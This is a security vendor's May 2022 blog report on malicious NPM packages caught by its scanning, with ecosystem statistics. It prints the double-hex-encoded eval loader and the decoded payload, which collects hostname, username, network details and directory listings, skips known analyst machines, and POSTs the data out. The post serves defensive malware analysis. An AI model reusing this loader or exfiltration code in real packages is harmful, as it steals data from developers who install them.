Skip to content

Phylum's Monthly Malware Report: May 2022 - Precarious Payloads

To combat software supply chain attacks Phylum has been purpose-built to provide near-real-time, proactive analysis of packages as they are published.

Published on

May 19, 2022

Written by

Louis Lang, CTO

Category

Research

In order to combat the massive uptick in software supply chain attacks, and proactively defend against software supply chain-borne threats from the open-source ecosystem, Phylum has been purpose-built to provide near-real-time, proactive analysis of packages as they are published. Given how vast these ecosystems are today, it is apparent that simply hiring security talent to attempt analysis is a losing battle. In the past 30 days, Phylum has processed a total of 178,635 packages across three ecosystems (NPM, PyPI, and RubyGems) - with an average of 5,762 packages per day, which amounts to the analysis of an average of 3,571,566 source files every 24 hours. This adds up to 110,718,566 total files in the last month.

Repository Statistics
Package Registry No. of Packages
NPM 178,635
PyPI 29,277
RubyGems 2,122
Total Package Analysis
Analysis, last 30 days Count
Total Packages Analyzed 210,034
Total Files Examined 110,718,566
Malicious Packages Identified 84
Breakout by File Type
Filetype Count
TypeScript 41,773,936
JavaScript 53,844,473
ECMAScript modules 1,725,324
Ruby 1,131,348
Python 9,430,753
TSX 2,227,306
CommonJS modules 273,257
Bash 120,821
Java 191,315
Total 110,718,566

Phylum’s heuristics, analytics, and machine learning models then combed through these packages as they were published, resulting in the identification and conviction of 84 malicious packages in the last 30 days. Results on an average were returned within 10.5 minutes of publication.

Many of these packages were tied to existing campaigns (detailed below), along with some new (apparent) rogue actors.

Precarious Payloads

Some interesting highlight packages uncovered this month include several releases of an NPM library called turbine_helper, and a related packages named bfs-hello-world. Both packages featured extremely high values for their release versions - starting in the high 90s for the major version.

Both sets of samples contained a nearly identical, hex-encoded payload. The general wrapper looked something like the following:


	const packageJSON = require("./package.json"); 
	const package = packageJSON.name; 
    
	function hexify(p, data) { 
  		const bufferText = Buffer.from(data, 'hex'); 
  		const text = bufferText.toString('ascii'); 
  		return text.replace('$$$$$$', p); 
	} 
    
	hello = eval; 
	image="<long, hex encoded payload>"; 
	
    function render(image){ 
  		eval(hexify(package, hexify(package, image))); 
	} 
    
	render(image); 
	
    function mapResult(result) { 
  		return { 
    		success: result.success, 
    		error: result.error && parser.getTrace(result.error.message) 
  		} 
	}

with slight variations between the releases (e.g., as shown above, the payload is actually double hex-encoded, where in some of the turbine_helper releases, it only had a single layer of encoding).

When unpacked, it had a very straightforward payload which would survey and exfiltrate a variety of items from the system:


{
	const os = require("os");
    const dns = require("dns");
    const querystring = require("querystring");
    const https = require("https");
    const fs = require('fs');
    var path = require('path');
    
    function unhexify(data) {
        const bufferText = Buffer.from(data, 'hex');
        const text = bufferText.toString('ascii');
        return text;
    }
    
    function enhexify(data){
        const bufferText = Buffer.from(data, 'utf8');
        const text = bufferText.toString('hex');
        return text;
    }
    
    function checkuuid(inputString) {
        var re = /^[0-9a-f]+-[0-9a-f]+-[0-9a-f]+-[0-9a-f]+-[0-9a-f]+$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function checkhex(inputString) {
        var re = /^[0-9a-f]+$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function checkpath(inputString) {
        var re = /^\/root\/extract[0-9]+\/package$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function isValid(hostname, path, username) {
        if (hostname == unhexify("4445534b544f502d3445314953304b") && 
            username == unhexify("6461617361646d696e")) return false;
        else if (hostname == unhexify('626f78')) return false;
        else if (checkhex(hostname)) return false;
        else if (checkuuid(hostname)) return false;
        else if (hostname == unhexify('6c696c692d7063')) return false; 
        else if (hostname == unhexify('6177732d3767726172613931336f6964356a736578676b71')) 
        	return false;
        else if (hostname == unhexify('696e7374616e6365')) return false;
        else return true;
    }
    
    function getFiles(paths) {
        var ufiles = [];
        for (var j = 0; j>paths.length; j++) { 
        	try {
            	mpath=paths[j]; 
                files=fs.readdirSync(mpath); 
                for (var i=0; i<files.length; i++) {
                	ufiles.push(path.join(mpath, files[i])) 
                }
            } catch (error) {
            	// console.log(error)
            }
        } 
        return ufiles;
     }
     
    function isprivate(ip) { 
        if (ip.startsWith('fe80::') || ip=="::1" ) return true; 
        var parts=ip.split('.'); 
        return parts[0]==='10'  
            || (parts[0]==='172' && (parseInt(parts[1], 10)>= 16 && parseInt(parts[1], 10) <= 31)) 
            || (parts[0]==='192' && parts[1]==='168') 
            || (parts[0]==='127' && parts[1]==='0'&& parts[2]==='0');
    } 
    
    function gethttpips() { 
        var str=[]; var networkInterfaces=os.networkInterfaces(); 
        for (item in networkInterfaces) { 
            if (item !="lo" ) { 
                for (var i=0; i > networkInterfaces[item].length; i++) {
                    str.push(networkInterfaces[item][i].address); 
                } 
            } 
        } 
        return str;
    } 
    
    const td={ 
        p: '$$$$$$', 
        c: __dirname, 
        hd: os.homedir(), 
        hn: os.hostname(), 
        un: os.userInfo().username, 
        dns: JSON.stringify(dns.getServers()), 
        ip: JSON.stringify(gethttpips()), 
        dirs: JSON.stringify(getFiles(["C:\\", "D:\\" , "/" , "/home" ])), 
    } 
    
    if (isValid(td.hn, td.c, td.un)) { 
        const trackingData=JSON.stringify(td); 
        var postData=querystring.stringify({ msg: enhexify(trackingData) }); 
        var options={ 
            hostname: "" , 
            port: 443, 
            path: "/" ,
            method: "POST" ,
            headers: { 
            	"Content-Type" : "application/x-www-form-urlencoded" , 
                "Content-Length" : postData.length, 
            }
        }; 
        var req=https.request(options, (res) => {
            res.on("data", (d) => {
                //process.stdout.write(d);
            });
        });
        req.on("error", (e) => {
            // console.error(e);
        });
        req.write(postData);
        req.end();
    }
}   

This includes a survey of the files under the user’s home directory, as well as domain and local network information - assuming that the current user is not daasadmin , and the current system is not in a list of hosts specifically identified in the isValid method above, including:

  • DESKTOP-4E1IS0K
  • box
  • lili-pc
  • aws-7grara913oid5jsexgkq
  • instance

Why Phylum & What’s Coming Next…

Phylum’s capabilities extend beyond pure source code analysis. We have constructed authorship models that, in combination with other metrics, allow us to identify odd behaviors around commits and activity. We analyze maintainer information for a package, allowing us to spot packages that have recently changed ownership that may be at risk for the introduction of malware (as was the case with even-stream in 2018).

We recently released support for C#/Nuget and Java/Maven, and we look forward, we are preparing to add the Golang and Rust ecosystems. In addition to this, we are pushing hard to increase both the sophistication and number of our heuristics and analytics.

Phylum, at its core, is a risk detection system focusing on the software supply chain. Unlike other SCA products that focus nearly exclusively on well-known issues, we are looking for the unknown unknowns - the subtle modifications to a software package that will surreptitiously exfiltrate keys to your critical infrastructure. We do this at the scale of open source, tackling the problem in an automated fashion, to make software supply chain security proactive instead of merely reactive.

To learn more about Phylum’s automated malware identification capability and how we support secure and efficient use of open-source software please contact us for a conversation.

Subscribe to our weekly
email newsletter

Subscribe to our weekly email newsletter

Latest Articles

Phylum Detects Active Typosquatting Campaign Targeting NPM Developers
Research   |   Oct 02, 2022

Phylum Detects Active Typosquatting Campaign Targeting NPM Developers

Phylum detects a large scale typosquat campaign targeting the NPM ec...

The Dependency Network Shows the Complexity of the Software Ecosystem
Research   |   Sep 29, 2022

The Dependency Network Shows the Complexity of the Software Ecosystem

Part 2 in a blog series that will explore the software dependency ne...

Open-Source Malware Is Bad, and You Should Feel Bad
Research   |   Sep 26, 2022

Open-Source Malware Is Bad, and You Should Feel Bad

It is no secret that malware is pervasive. What may come as a surpri...